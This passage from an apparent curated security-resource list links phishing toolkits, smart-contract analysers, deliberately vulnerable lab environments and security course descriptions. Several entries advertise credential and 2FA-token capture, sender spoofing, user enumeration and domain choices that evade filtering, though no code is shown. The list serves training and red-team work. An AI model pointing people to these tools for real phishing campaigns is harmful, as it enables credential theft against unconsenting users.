href="https://github.com/GemGeorge/SniperPhish/">GemGeorge/SniperPhish/</a></td> <td>SniperPhish - The Web-Email Spear Phishing Toolkit</td> </tr> <tr> <td><a href="https://github.com/gophish/gophish">gophish/gophish</a></td> <td>Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training</td> </tr> <tr> <td><a href="https://github.com/htr-tech/zphisher">htr-tech/zphisher</a></td> <td>An automated phishing tool with 30+ templates.</td> </tr> <tr> <td><a href="https://github.com/kgretzky/evilginx2">kgretzky/evilginx2</a></td> <td>Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication</td> </tr> <tr> <td><a href="https://mailsploit.pwnsdx.com/index">Mailsploit</a></td> <td>TL;DR: Mailsploit is a collection of bugs in email clients that allow effective sender spoofing and code injection attacks. The spoofing is not detected by Mail Transfer Agents (MTA) aka email servers, therefore circumventing spoofing protection mechanisms such as DMARC (DKIM/SPF) or spam filters.</td> </tr> <tr> <td><a href="https://github.com/mdsecactivebreach/o365-attack-toolkit">mdsecactivebreach/o365-attack-toolkit</a></td> <td>o365-attack-toolkit allows operators to perform an OAuth phishing attack and later on use the Microsoft Graph API to extract interesting information.</td> </tr> <tr> <td><a href="https://github.com/Mr-Un1k0d3r/CatMyPhish">Mr-Un1k0d3r/CatMyPhish</a></td> <td>Search for categorized domain</td> </tr> <tr> <td><a href="https://github.com/muraenateam/muraena">muraenateam/muraena</a></td> <td>Muraena is an almost-transparent reverse proxy aimed at automating phishing and post-phishing activities.</td> </tr> <tr> <td><a href="https://github.com/optiv/Microsoft365_devicePhish">optiv/Microsoft365_devicePhish</a></td> <td>A proof-of-concept script to conduct a phishing attack abusing Microsoft 365 OAuth Authorization Flow</td> </tr> <tr> <td><a href="https://wanetty.github.io/tools/pofish">PoFish</a></td> <td>A new docker for phishing (PoFish)</td> </tr> <tr> <td><a href="https://pretext-project.github.io/">Pretext Project</a></td> <td>Open-Source Collection of Social Engineering Pretexts</td> </tr> <tr> <td><a href="https://github.com/Raikia/UhOh365">Raikia/UhOh365</a></td> <td> A script that can see if an email address is valid in Office365 (user/email enumeration). This does not perform any login attempts, is unthrottled, and is incredibly useful for social engineering assessments to find which emails exist and which don't. </td> </tr> <tr> <td><a href="https://github.com/ralphte/build_a_phish">ralphte/build_a_phish</a></td> <td>Ansible playbook to deploy a phishing engagement in the cloud.</td> </tr> <tr> <td><a href="https://github.com/Rices/Phishious">Rices/Phishious</a></td> <td>An open-source Secure Email Gateway (SEG) evaluation toolkit designed for red-teamers.</td> </tr> <tr> <td><a href="https://github.com/ring0lab/catphish">ring0lab/catphish</a></td> <td>Generate similar-looking domains for phishing attacks. Check expired domains and their categorized domain status to evade proxy categorization. Whitelisted domains are perfect for your C2 servers.</td> </tr> <tr> <td><a href="https://github.com/sebastian-mora/awsssome_phish">sebastian-mora/awsssome_phish</a></td> <td>AWS SSO serverless phishing API.</td> </tr> <tr> <td><a href="https://github.com/securestate/king-phisher/">securestate/king-phisher</a></td> <td>Phishing Campaign Toolkit</td> </tr> <tr> <td><a href="https://github.com/secureworks/PhishInSuits">secureworks/PhishInSuits</a></td> <td>PhishInSuits: OAuth Device Code Phishing with Verified Apps</td> </tr> <tr> <td><a href="https://github.com/thelinuxchoice/blackeye">thelinuxchoice/blackeye</a></td> <td>The most complete Phishing Tool, with 32 templates +1 customizable</td> </tr> <tr> <td><a href="https://github.com/thelinuxchoice/shellphish">thelinuxchoice/shellphish</a></td> <td>Phishing Tool for 18 social media: Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest</td> </tr> <tr> <td><a href="https://github.com/threatexpress/domainhunter">threatexpress/domainhunter</a></td> <td>Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names</td> </tr> <tr> <td><a href="https://github.com/UndeadSec/EvilURL">Undeadsec/EvilURL</a></td> <td>An unicode domain phishing generator for IDN Homograph Attack</td> </tr> <tr> <td><a href="https://github.com/UndeadSec/SocialFish">UndeadSec/SocialFish</a></td> <td>Ultimate phishing tool. Socialize with the credentials</td> </tr> <tr> <td><a href="https://github.com/ustayready/CredSniper">ustayready/CredSniper</a></td> <td>CredSniper is a phishing framework written with the Python micro-framework Flask and Jinja2 templating which supports capturing 2FA tokens.</td> </tr> <tr> <td><a href="https://github.com/xiecat/goblin">xiecat/goblin</a></td> <td>Goblin for Phishing Exercise Tools</td> </tr> <tr> <td><a href="https://github.com/Yaxser/SharpPhish">Yaxser/SharpPhish</a></td> <td>Using outlook COM objects to create convincing phishing emails without the user noticing. This project is meant for internal phishing.</td> </tr> </table> ## Smart Contract <table> <tr> <td><b>Link</b></td> <td><b>Description</b></td> </tr> <tr> <td><a href="https://www.breadcrumbs.app/">breadcrumbs</a></td> <td>Breadcrumbs is a blockchain analytics platform accessible to everyone. It offers a range of tools for investigating, monitoring, tracking and sharing relevant information on blockchain transactions.</td> </tr> <tr> <td><a href="https://github.com/cleanunicorn/karl">cleanunicorn/karl</a></td> <td>Monitor smart contracts deployed on blockchain and test against vulnerabilities with Mythril</td> </tr> <tr> <td><a href="https://github.com/ConsenSys/mythril">ConsenSys/mythril</a></td> <td>Security analysis tool for EVM bytecode. Supports smart contracts built for Ethereum, Hedera, Quorum, Vechain, Roostock, Tron and other EVM-compatible blockchains.</td> </tr> <tr> <td><a href="https://contract-library.com/">Contract list</a></td> <td>Ethereum Contract Library by Dedaub</td> </tr> <tr> <td><a href="https://github.com/ConsenSys/smart-contract-best-practices">ConsenSys/smart-contract-best-practices</a></td> <td>A guide to smart contract security best practices</td> </tr> <tr> <td><a href="https://github.com/crytic/echidna">crytic/echidna</a></td> <td>Ethereum smart contract fuzzer</td> </tr> <tr> <td><a href="https://github.com/csienslab/ProMutator">csienslab/ProMutator</a></td> <td>ProMutator: Detecting Vulnerable Price Oracles in DeFi by Mutated Transactions</td> </tr> <tr> <td><a href="https://github.com/crytic/slither">crytic/slither</a></td> <td>Static Analyzer for Solidity</td> </tr> <tr> <td><a href="https://github.com/ethereum-lists/contracts">ethereum-lists/contracts</a></td> <td>List of contracts from known projects (work in progress)</td> </tr> <tr> <td><a href="https://ethtx.info/">EthTx Transaction Decoder</a></td> <td>EthTx is an open source decoder of blockchain transactions that is made freely available to the Ethereum Community as a Python library in public PyPi index</td> </tr> <tr> <td><a href="https://github.com/enzymefinance/oyente">enzymefinance/oyente</a></td> <td>An Analysis Tool for Smart Contracts</td> </tr> <tr> <td><a href="https://eth.build/">ETH.Build</a></td> <td>An Educational Sandbox For Web3... And Much More.</td> </tr> <tr> <td><a href="https://monitor.blocksecteam.com/flashloan/">flashloan-monitor</a></td> <td>BlockSec Flashloan Monitor</td> </tr> <tr> <td><a href="https://github.com/fravoll/solidity-patterns">fravoll/solidity-patterns</a></td> <td>A compilation of patterns and best practices for the smart contract programming language Solidity</td> </tr> <tr> <td><a href="https://github.com/IC3Hydra/Hydra">IC3Hydra/Hydra</a></td> <td>Framework for cryptoeconomic contract security, decentralized security bounties. Live on Ethereum.</td> </tr> <tr> <td><a href="https://lossless.cash/">Lossless</a></td> <td>The first DeFi hack mitigation tool for token creators.</td> </tr> <tr> <td><a href="https://github.com/mikedeshazer/bricks">mikedeshazer/bricks</a></td> <td>Bricks is a sandbox and instruction manual collection for building smart contract exploits for Ethereum blockchains, designed to help developers think like hackers in a safe, fun environment.</td> </tr> <tr> <td><a href="https://mythx.io/">Mytx</a></td> <td>Smart contract security service for Ethereum</td> </tr> <tr> <td><a href="https://github.com/nccgroup/GOATCasino">nccgroup/GOATCasino</a></td> <td>This is an intentionally vulnerable smart contract truffle deployment aimed at allowing those interested in smart contract security to exploit a wide variety of issues in a safe environment.</td> </tr> <tr> <td><a href="https://github.com/OpenZeppelin/contracts-wizard">OpenZeppelin/contracts-wizard</a></td> <td>Interactive smart contract generator based on OpenZeppelin Contracts.</td> </tr> <tr> <td><a href="https://github.com/OpenZeppelin/damn-vulnerable-defi">OpenZeppelin/damn-vulnerable-defi</a></td> <td>A set of challenges to hack implementations of DeFi in Ethereum. Featuring flash loans, oracles, governance, NFTs, lending pools, and more!</td> </tr> <tr> <td><a href="https://github.com/raineorshine/solgraph">raineorshine/solgraph</a></td> <td>Visualize Solidity control flow for smart contract security analysis. 💵 ⇆ 💵</td> </tr> <tr> <td><a href="https://github.com/Robsonsjre/FlashloanUsecases">Robsonsjre/FlashloanUsecases</a></td> <td>DeFi 201 - Lets hack Flash Loans</td> </tr> <tr> <td><a href="https://github.com/sigp/beacon-fuzz">sigp/beacon-fuzz</a></td> <td>Differential Fuzzer for Ethereum 2.0</td> </tr> <tr> <td><a href="https://github.com/smartbugs/smartbugs">smartbugs/smartbugs</a></td> <td>SmartBugs: A Framework to Analyze Solidity Smart Contracts</td> </tr> <tr> <td><a href="https://ethernaut.openzeppelin.com/">The Ethernaut</a></td> <td>The Ethernaut is a Web3/Solidity based wargame inspired on overthewire.org, played in the Ethereum Virtual Machine. Each level is a smart contract that needs to be 'hacked'.</td> </tr> </table> ## Vulnerable <table> <tr> <td><b>Link</b></td> <td><b>Description</b></td> </tr> <tr> <td><a href="https://github.com/appsecco/VyAPI">appsecco/VyAPI</a></td> <td>VyAPI - A cloud based vulnerable hybrid Android App</a></td> </tr> <tr> <td><a href="https://github.com/atxsinn3r/VulnCases">atxsinn3r/VulnCases</a></td> <td>Vulnerability examples.</td> </tr> <tr> <td><a href="https://github.com/AutomatedLab/AutomatedLab">AutomatedLab/AutomatedLab</a></td> <td>AutomatedLab is a provisioning solution and framework that lets you deploy complex labs on HyperV and Azure with simple PowerShell scripts. It supports all Windows operating systems from 2008 R2 to 2016 including Nano Server and various products like AD, Exchange, PKI, IIS, etc.</td> </tr> <tr> <td><a href="https://github.com/avishayil/caponeme">avishayil/caponeme</a></td> <td>Repository demonstrating the Capital One breach on your AWS account</td> </tr> <tr> <td><a href="https://github.com/Azure/Convex">Azure/Convex</a></td> <td>Cloud Open-source Network Vulnerability Exploitation eXperience (CONVEX) spins up Capture The Flag environments in your Azure tenant for participants to play through.</td> </tr> <tr> <td><a href="https://github.com/Azure/SimuLand">Azure/SimuLand</a></td> <td>Understand adversary tradecraft and improve detection strategies</td> </tr> <tr> <td><a href="https://github.com/Billy-Ellis/Exploit-Challenges">Billy-Ellis/Exploit-Challenges</a></td> <td>A collection of vulnerable ARM binaries for practicing exploit development</td> </tr> <tr> <td><a href="https://github.com/bkerler/exploit_me">bkerler/exploit_me</a></td> <td>Very vulnerable ARM application (CTF style exploitation tutorial)</td> </tr> <tr> <td><a href="https://github.com/bkimminich/juice-shop">bkimminich/juice-shop</a></td> <td>OWASP Juice Shop is an intentionally insecure webapp for security trainings written entirely in Javascript which encompasses the entire OWASP Top Ten and other severe security flaws.</td> </tr> <tr> <td><a href="https://github.com/brant-ruan/metarget">brant-ruan/metarget</a></td> <td>Framework providing automatic constructions of vulnerable infrastructures</td> </tr> <tr> <td><a href="https://github.com/bridgecrewio/terragoat">bridgecrewio/terragoat</a></td> <td>TerraGoat is Bridgecrew's "Vulnerable by Design" Terraform repository. TerraGoat is a learning and training project that demonstrates how common configuration errors can find their way into production cloud environments.</td> </tr> <tr> <td><a href="https://github.com/clong/DetectionLab">clong/DetectionLab</a></td> <td>Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices</td> </tr> <tr> <td><a href="https://github.com/cliffe/SecGen">cliffe/SecGen</a></td> <td>SecGen creates vulnerable virtual machines so students can learn security penetration testing techniques.</td> </tr> <tr> <td><a href="https://github.com/CodeShield-Security/Serverless-Goat-Java">CodeShield-Security/Serverless-Goat-Java</a></td> <td>Java version of the deliberately vulnerable serverless application Serverless-Goat from https://github.com/OWASP/Serverless-Goat</td> </tr> <tr> <td><a href="https://github.com/detectify/vulnerable-nginx">detectify/vulnerable-nginx</a></td> <td>An intentionally vulnerable NGINX setup</td> </tr> <tr> <td><a href="https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application">dolevf/Damn-Vulnerable-GraphQL-Application</a></td> <td>Damn Vulnerable GraphQL Application is an intentionally vulnerable implementation of Facebook's GraphQL technology, to learn and practice GraphQL Security.</td> </tr> <tr> <td><a href="https://github.com/Flangvik/DeployPrinterNightmare">Flangvik/DeployPrinterNightmare</a></td> <td>C# tool for installing a shared network printer abusing the PrinterNightmare bug to allow other network machines easy privesc!</td> </tr> <tr> <td><a href="https//github.com/globocom/secDevLabs">globocom/secDevLabs</a></td> <td>A laboratory for learning secure web and mobile development in a practical manner.</td> </tr> <tr> <td><a href="https://github.com/google/google-ctf">google/google-ctf</a></td> <td>This repository lists most of the challenges used in the Google CTF 2017. The missing challenges are not ready to be open-sourced, or contain third-party code.</td> </tr> <tr> <td><a href="https://github.com/kmcquade/owasp-youtube-2021">kmcquade/owasp-youtube-2021</a></td> <td>Deliberately vulnerable AWS resources for security assessment demos</td> </tr> <tr> <td><a href="https://tuts4you.com/download.php?list.17">Lenas Reversing for Newbies</a></td> <td>Nice collection of tutorials aimed particularly for newbie reverse enginners...</td> </tr> <tr> <td><a href="https://github.com/InsiderPhD/Generic-University">InsiderPhD/Generic-University</a></td> <td>Vulnerable API</td> </tr> <tr> <td><a href="https://github.com/madhuakula/kubernetes-goat">madhuakula/kubernetes-goat</a></td> <td>Kubernetes Goat is "Vulnerable by Design" Kubernetes Cluster. Designed to be an intentionally vulnerable cluster environment to learn and practice Kubernetes security.</td> </tr> <tr> <td><a href="https://github.com/nccgroup/sadcloud">nccgroup/sadcloud</a></td> <td>A tool for standing up (and tearing down!) purposefully insecure cloud infrastructure</td> </tr> <tr> <td><a href="https://github.com/OWASP/iGoat-Swift">OWASP/iGoat-Swift</a></td> <td>OWASP iGoat (Swift) - A Damn Vulnerable Swift Application for iOS</td> </tr> <tr> <td><a href="https://github.com/quarkslab/minik8s-ctf">quarkslab/minik8s-ctf</a></td> <td>A beginner-friendly CTF about Kubernetes security.</td> </tr> <tr> <td><a href="https://github.com/rapid7/hackazon">rapid7/hackazon</a></td> <td>A modern vulnerable web app</td> </tr> <tr> <td><a href="https://github.com/rewanth1997/Damn-Vulnerable-Bank">rewanth1997/Damn-Vulnerable-Bank</a></td> <td>Vulnerable Banking Application for Android</td> </tr> <tr> <td><a href="https://martin.uy/blog/projects/reverse-engineering/">Reverse Engineering</a></td> <td>Welcome to the Reverse Engineering open course! This course is a journey into executable binaries and operating systems from 3 different angles: 1) Malware analysis, 2) Bug hunting and 3) Exploit writing. Both Windows and Linux x86/x86_64 platforms are under scope.</td> </tr> <tr> <td><a href="https://github.com/sagishahar/lpeworkshop">sagishahar/lpeworkshop</a></td> <td>Windows / Linux Local Privilege Escalation Workshop</td> </tr> <tr> <td><a href="http://www.cis.syr.edu/~wedu/seed/labs.html">SEED Labs</a></td> <td>Various labs from SEED Project</td> </tr> <tr> <td><a href="https://github.com/shellphish/how2heap">shellphish/how2heap</a></td> <td>A repository for learning various heap exploitation techniques.</td> </tr> <tr> <td><a href="https://www.notsosecure.com/vulnerable-docker-vm/">Vulnerable Docker VM</a></td> <td>Ever fantasized about playing with docker misconfigurations, privilege escalation, etc. within a container?</td> </tr> <tr> <td><a href="https//github.com/vulhub/vulhub">vulhub/vulhub</a></td> <td>Pre-Built Vulnerable Environments Based on Docker-Compose</td> </tr> </table> Massive Online Open Courses =========================== #### Stanford University - Computer Security In this class you will learn how to design secure systems and write secure code. You will learn how to find vulnerabilities in code and how to design software systems that limit the impact of security vulnerabilities. We will focus on principles for building secure systems and give many real world examples. - [Stanford University - Computer Security](https://www.coursera.org/learn/security) #### Stanford University - Cryptography I This course explains the inner workings of cryptographic primitives and how to correctly use them. Students will learn how to reason about the security of cryptographic constructions and how to apply this knowledge to real-world applications. The course begins with a detailed discussion of how two parties who have a shared secret key can communicate securely when a powerful adversary eavesdrops and tampers with traffic. We will examine many deployed protocols and analyze mistakes in existing systems. The second half of the course discusses public-key techniques that let two or more parties generate a shared secret key. We will cover the relevant number theory and discuss public-key encryption and basic key-exchange. Throughout the course students will be exposed to many exciting open problems in the field. - [Stanford University - Cryptography I](https://www.coursera.org/learn/crypto) #### Stanford University - Cryptography II This course is a continuation of Crypto I and explains the inner workings of public-key systems and cryptographic protocols. Students will learn how to reason about the security of cryptographic constructions and how to apply this knowledge to real-world applications. The course begins with constructions for digital signatures and their applications. We will then discuss protocols for user authentication and zero-knowledge protocols. Next we will turn to privacy applications of cryptography supporting anonymous credentials and private database lookup. We will conclude with more advanced topics including multi-party computation and elliptic curve cryptography. - [Stanford University - Cryptography II](https://www.coursera.org/learn/crypto2) #### University of Maryland - Usable Security This course focuses on how to design and build secure systems with a human-centric focus. We will look at basic principles of human-computer interaction, and apply these insights to the design of secure systems with the goal of developing security measures that respect human performance and their goals within a system. - [University of Maryland - Usable Security](https://www.coursera.org/learn/usablesec) #### University of Maryland - Software Security This course we will explore the foundations of software security. We will consider important software vulnerabilities and attacks that exploit them -- such as buffer overflows, SQL injection, and session hijacking -- and we will consider defenses that prevent or mitigate these attacks, including advanced testing and program analysis techniques. Importantly, we take a "build security in" mentality, considering techniques at each phase of the development cycle that can be used to strengthen the security of software systems. - [University of Maryland - Software Security](https://www.coursera.org/learn/softwaresec) #### University of Maryland - Cryptography This course will introduce you to the foundations of modern cryptography, with an eye toward practical applications. We will learn the importance of carefully defining security; of relying on a set of well-studied "hardness assumptions" (e.g., the hardness of factoring large numbers); and of the possibility of proving security of complicated constructions based on low-level primitives. We will not only cover these ideas in theory, but will also explore their real-world impact. You will learn about cryptographic primitives in wide use today, and see how these can be combined to develop modern protocols for secure communication. - [University of Maryland - Cryptography](https://www.coursera.org/learn/cryptography) #### University of Maryland - Hardware Security This course will introduce you to the foundations of modern cryptography, with an eye toward practical applications. We will learn the importance of carefully defining security; of relying on a set of well-studied “hardness assumptions” (e.g., the hardness of factoring large numbers); and of the possibility of proving security of complicated constructions based on low-level primitives. We will not only cover these ideas in theory, but will also explore their real-world impact. You will learn about cryptographic primitives in wide use today, and see how these can be combined to develop modern protocols for secure communication. - [University of Maryland - Hardware Security](https://www.coursera.org/learn/hardwaresec) #### University of Washington - Introduction to CyberSecurity This course will introduce you to the cybersecurity, ideal for learners who are curious about the world of Internet security and who want to be literate in the field. This course will take a ride in to cybersecurity feild for beginners. - [University of Washington - Introduction to CyberSecurity](https://www.edx.org/course/introduction-to-cybersecurity) #### University of Washington - Finding Your Cybersecurity Career Path There are 5-6 major job roles in industry for cybersecurity enthusiast. In This course you will Learn about different career pathways in cybersecurity and complete a self-assessment project to better understand the right path for you. - [University of Washington - Finding Your Cybersecurity Career Path](https://www.edx.org/course/finding-your-cybersecurity-career-path) #### University of Washington - Essentials of Cybersecurity This course is good for beginner It contains introduction to cybersecurity, The CISO's view, Helps you building cybersecurity toolKit and find your cybersecurity career path. - [University of Washington - Essentials of Cybersecurity](https://www.edx.org/professional-certificate/uwashingtonx-essentials-cybersecurity) Academic Courses ================ #### NYU Tandon School of Engineering - OSIRIS Lab's Hack Night Developed from the materials of NYU Tandon's old Penetration Testing and Vulnerability Analysis course, Hack Night is a sobering introduction to offensive security. A lot of complex technical content is covered very quickly as students are introduced to a wide variety of complex and immersive topics over thirteen weeks. - [NYU Tandon's OSIRIS Lab's Hack Night](https://github.com/isislab/Hack-Night) #### Florida State University's - Offensive Computer Security The primary incentive for an attacker to exploit a vulnerability, or series of vulnerabilities is to achieve a return on an investment (his/her time usually). This return need not be strictly monetary, an attacker may be interested in obtaining access to data, identities, or some other commodity that is valuable to them. The field of penetration testing involves authorized auditing and exploitation of systems to assess actual system security in order to protect against attackers. This requires thorough knowledge of vulnerabilities and how to exploit them. Thus, this course provides an introductory but comprehensive coverage of the fundamental methodologies, skills, legal issues, and tools used in white hat penetration testing and secure system administration. * [Offensive Computer Security - Spring 2014](http://www.cs.fsu.edu/~redwood/OffensiveComputerSecurity) * [Offensive Computer Security - Spring 2013](http://www.cs.fsu.edu/~redwood/OffensiveSecurity) #### Florida State University's - Offensive Network Security This class allows students to look deep into know protocols (i.e. IP, TCP, UDP) to see how an attacker can utilize these protocols to their advantage and how to spot issues in a network via captured network traffic. The first half of this course focuses on know protocols while the second half of the class focuses on reverse engineering unknown protocols. This class will utilize captured traffic to allow students to reverse the protocol by using known techniques such as incorporating bioinformatics introduced by Marshall Beddoe. This class will also cover fuzzing protocols to see if the server or client have vulnerabilities. Overall, a student finishing this class will have a better understanding of the network layers, protocols, and network communication and their interaction in computer networks. * [Offensive Network Security](http://www.cs.fsu.edu/~lawrence/OffNetSec/) #### Rensselaer Polytechnic Institute - Malware Analysis This course will introduce students to modern malware analysis techniques through readings and hands-on interactive analysis of real-world samples. After taking this course students will be equipped with the skills to analyze advanced contemporary malware using both static and dynamic analysis. - [CSCI 4976 - Fall '15 Malware Analysis](https://github.com/RPISEC/Malware) #### Rensselaer Polytechnic Institute - Modern Binary Exploitation This course will start off by covering basic x86 reverse engineering, vulnerability analysis, and classical forms of Linux-based userland binary exploitation. It will then transition into protections found on modern systems (Canaries, DEP, ASLR, RELRO, Fortify Source, etc) and the techniques used to defeat them. Time permitting, the course will also cover other subjects in exploitation including kernel-land and Windows based exploitation. * [CSCI 4968 - Spring '15 Modern Binary Exploitation](https://github.com/RPISEC/MBE) #### Rensselaer Polytechnic Institute - Hardware Reverse Engineering Reverse engineering techniques for semiconductor devices and their applications to competitive analysis, IP litigation, security testing, supply chain verification, and failure analysis. IC packaging technologies and sample preparation techniques for die recovery and live analysis. Deprocessing and staining methods for revealing features bellow top passivation. Memory technologies and appropriate extraction techniques for each. Study contemporary anti-tamper/anti-RE methods and their effectiveness at protecting designs from attackers. Programmable logic microarchitecture and the issues involved with reverse engineering programmable logic. - [CSCI 4974/6974 - Spring '14 Hardware Reverse Engineering](http://security.cs.rpi.edu/courses/hwre-spring2014/) #### City College of San Francisco - Sam Bowne Class - [CNIT 40: DNS Security ](https://samsclass.info/40/40_F16.shtml)<br> DNS is crucial for all Internet transactions, but it is subject to numerous security risks, including phishing, hijacking, packet amplification, spoofing, snooping, poisoning, and more. Learn how to configure secure DNS servers, and to detect malicious activity with DNS monitoring. We will also cover DNSSEC principles and deployment. Students will perform hands-on projects deploying secure DNS servers on both Windows and Linux platforms. - [CNIT 120 - Network Security](https://samsclass.info/120/120_S15.shtml)<br> Knowledge and skills required for Network Administrators and Information Technology professionals to be aware of security vulnerabilities, to implement security measures, to analyze an existing network environment in consideration of known security threats or risks, to defend against attacks or viruses, and to ensure data privacy and integrity. Terminology and procedures for implementation and configuration of security, including access control, authorization, encryption, packet filters, firewalls, and Virtual Private Networks (VPNs). - [CNIT 121 - Computer Forensics](https://samsclass.info/121/121_F16.shtml)<br> The class covers forensics tools, methods, and procedures used for investigation of computers, techniques of data recovery and evidence collection, protection of evidence, expert witness skills, and computer crime investigation techniques. Includes analysis of various file systems and specialized diagnostic software used to retrieve data. Prepares for part of the industry standard certification exam, Security+, and also maps to the Computer Investigation Specialists exam. - [CNIT 123 - Ethical Hacking and Network Defense](https://samsclass.info/123/123_S17.shtml)<br> Students learn how hackers attack computers and networks, and how to protect systems from such attacks, using both Windows and Linux systems. Students will learn legal restrictions and ethical guidelines, and will be required to obey them. Students will perform many hands-on labs, both attacking and defending, using port scans, footprinting, exploiting Windows and Linux vulnerabilities, buffer overflow exploits, SQL injection, privilege escalation, Trojans, and backdoors. - [CNIT 124 - Advanced Ethical Hacking](https://samsclass.info/124/124_F15.shtml)<br> Advanced techniques of defeating computer security, and countermeasures to protect Windows and Unix/Linux systems. Hands-on labs include Google hacking, automated footprinting, sophisticated ping and port scans, privilege escalation, attacks against telephone and Voice over Internet Protocol (VoIP) systems, routers, firewalls, wireless devices, Web servers, and Denial of Service attacks. - [CNIT 126 - Practical Malware Analysis](https://samsclass.info/126/126_S16.shtml)<br> Learn how to analyze malware, including computer viruses, trojans, and rootkits, using disassemblers, debuggers, static and dynamic analysis, using IDA Pro, OllyDbg and other tools. - [CNIT 127 - Exploit Development](https://samsclass.info/127/127_S17.shtml)<br> Learn how to find vulnerabilities and exploit them to gain control of target systems, including Linux, Windows, Mac, and Cisco. This class covers how to write tools, not just how to use them; essential skills for advanced penetration testers and software security professionals. - [CNIT 128 - Hacking Mobile Devices](https://samsclass.info/128/128_S17.shtml)<br> Mobile devices such as smartphones and tablets are now used for making purchases, emails, social networking, and many other risky activities. These devices run specialized operating systems have many security problems. This class will cover how mobile operating systems and apps work, how to find and exploit vulnerabilities in them, and how to defend them. Topics will include phone call, voicemail, and SMS intrusion, jailbreaking, rooting, NFC attacks, malware, browser exploitation, and application vulnerabilities. Hands-on projects will include as many of these activities as are practical and legal. - [CNIT 129S: Securing Web Applications](https://samsclass.info/129S/129S_F16.shtml)<br> Techniques used by attackers to breach Web applications, and how to protect them. How to secure authentication, access, databases, and back-end components. How to protect users from each other. How to find common vulnerabilities in compiled code and source code. - [CNIT 140: IT Security Practices](https://samsclass.info/140/140_F16.shtml)<br> Training students for cybersecurity competitions, including CTF events and the [Collegiate Cyberdefense Competition (CCDC)](http://www.nationalccdc.org/). This training will prepare students for employment as security professionals, and if our team does well in the competitions, the competitors will gain recognition and respect which should lead to more and better job offers. - [Violent Python and Exploit Development](https://samsclass.info/127/127_WWC_2014.shtml)<br> In the exploit development section, students will take over vulnerable systems with simple Python scripts. #### Eurecom - Mobile Systems and Smartphone Security (MOBISEC) Hands-On course coverings topics such as mobile ecosystem, the design and architecture of mobile operating systems, application analysis, reverse engineering, malware detection, vulnerability assessment, automatic static and dynamic analysis, and exploitation and mitigation techniques. Besides the slides for the course, there are also multiple challenges covering mobile app development, reversing and exploitation. - [MOBISEC2018](https://mobisec.reyammer.io/) ## Open Security Training OpenSecurityTraining.info is dedicated to sharing training material for computer security classes, on any topic, that are at least one day long. #### Beginner Classes - [Android Forensics & Security Testing](http://opensecuritytraining.info/AndroidForensics.html)<br> This class serves as a foundation for mobile digital forensics, forensics of Android operating systems, and penetration testing of Android applications. - [Certified Information Systems Security Professional (CISSP)® <br>Common Body of Knowledge (CBK)® Review](http://opensecuritytraining.info/CISSP-Main.html)<br> The CISSP CBK Review course is uniquely designed for federal agency information assurance (IA) professionals in meeting [NSTISSI-4011](http://www.cnss.gov/Assets/pdf/nstissi_4011.pdf), National Training Standard for Information Systems Security Professionals, as required by [DoD 8570.01-M](http://www.dtic.mil/whs/directives/corres/pdf/857001m.pdf), Information Assurance Workforce Improvement Program. - [Flow Analysis & Network Hunting](http://opensecuritytraining.info/Flow.html)<br> This course focuses on network analysis and hunting of malicious activity from a security operations center perspective. We will dive into the netflow strengths, operational limitations of netflow, recommended sensor placement, netflow tools, visualization of network data, analytic trade craft for network situational awareness and networking hunting scenarios. - [Hacking Techniques and Intrusion Detection](http://opensecuritytraining.info/HTID.html)<br> The course is designed to help students gain a detailed insight into the practical and theoretical aspects of advanced topics in hacking techniques and intrusion detection. - [Introductory Intel x86: Architecture, Assembly, Applications, & Alliteration](http://opensecuritytraining.info/IntroX86.html)<br> This class serves as a foundation for the follow on Intermediate level x86 class. It teaches the basic concepts and describes the hardware that assembly code deals with. It also goes over many of the most common assembly instructions. Although x86 has hundreds of special purpose instructions, students will be shown it is possible to read most programs by knowing only around 20-30 instructions and their variations. - [Introductory Intel x86-64: Architecture, Assembly, Applications, & Alliteration](http://opensecuritytraining.info/IntroX86-64.html)<br> This class serves as a foundation for the follow on Intermediate level x86 class. It teaches the basic concepts and describes the hardware that assembly code deals with. It also goes over many of the most common assembly instructions. Although x86 has hundreds of special purpose instructions, students will be shown it is possible to read most programs by knowing only around 20-30 instructions and their variations. - [Introduction to ARM](http://opensecuritytraining.info/IntroARM.html)<br> This class builds on the Intro to x86 class and tries to provide parallels and differences between the two processor architectures wherever possible while focusing on the ARM instruction set, some of the ARM processor features, and how software works and runs on the ARM processor. - [Introduction to Cellular Security](http://opensecuritytraining.info/IntroCellSec.html)<br> This course is intended to demonstrate the core concepts of cellular network security. Although the course discusses GSM, UMTS, and LTE - it is heavily focused on LTE. The course first introduces important cellular concepts and then follows the evolution of GSM to LTE. - [Introduction to Network Forensics](http://opensecuritytraining.info/NetworkForensics.html)<br> This is a mainly lecture based class giving an introduction to common network monitoring and forensic techniques. - [Introduction to Secure Coding](http://opensecuritytraining.info/IntroSecureCoding.html)<br> This course provides a look at some of the most prevalent security related coding mistakes made in industry today. Each type of issue is explained in depth including how a malicious user may attack the code, and strategies for avoiding the issues are then reviewed. - [Introduction to Vulnerability Assessment](http://opensecuritytraining.info/IntroductionToVulnerabilityAssessment.html)<br> This is a lecture and lab based class giving an introduction to vulnerability assessment of some common common computing technologies. Instructor-led lab exercises are used to demonstrate specific tools and technologies. - [Introduction to Trusted Computing](http://opensecuritytraining.info/IntroToTrustedComputing.html)<br> This course is an introduction to the fundamental technologies behind Trusted Computing. You will learn what Trusted Platform Modules (TPMs) are and what capabilities they can provide both at an in-depth technical level and in an enterprise context. You will also learn about how other technologies such as the Dynamic Root of Trust for Measurement (DRTM) and virtualization can both take advantage of TPMs and be used to enhance the TPM's capabilities. - [Offensive, Defensive, and Forensic Techniques for Determining Web User Identity](http://opensecuritytraining.info/WebIdentity.html)<br> This course looks at web users from a few different perspectives. First, we look at identifying techniques to determine web user identities from a server perspective. Second, we will look at obfuscating techniques from a user whom seeks to be anonymous. Finally, we look at forensic techniques, which, when given a hard drive or similar media, we identify users who accessed that server. - [Pcap Analysis & Network Hunting](http://opensecuritytraining.info/Pcap.html)<br> Introduction to Packet Capture (PCAP) explains the fundamentals of how, where, and why to capture network traffic and what to do with it. This class covers open-source tools like tcpdump, Wireshark, and ChopShop in several lab exercises that 